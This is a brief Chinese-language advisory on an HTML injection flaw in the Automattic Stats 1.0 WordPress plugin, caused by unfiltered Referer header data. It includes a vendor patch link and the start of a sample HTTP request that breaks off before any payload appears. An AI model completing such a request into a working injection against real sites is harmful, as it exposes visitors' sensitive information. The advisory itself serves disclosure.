WordPress是一款基于WEB的BLOG系统。
基于WordPress上的自动统计模块不正确处理用户提交的输入,远程攻击者可以利用漏洞进行HTML注入攻击,获得敏感信息。
问题是由于不正确过滤用户生成的HTTP头字段中的Referer参数数据,提交恶意的HTTP数据,并诱使用户访问,可导致获得目标用户敏感信息。
Skeltoac Automattic Stats 1.0
可联系供应商获得补丁信息:
<a href=“http://wordpress.org/extend/plugins/stats/” target=“_blank”>http://wordpress.org/extend/plugins/stats/</a>
GET http://www.somewpblog.com/ HTTP/1.1
Host:www.siteofblogger.com
User-Agent:Mozilla/5.0 (Windows; U; Windows NT 5.0; it; rv:1.8.1.3)
Gecko/20070309 Firefox/2.0.0.3
Accept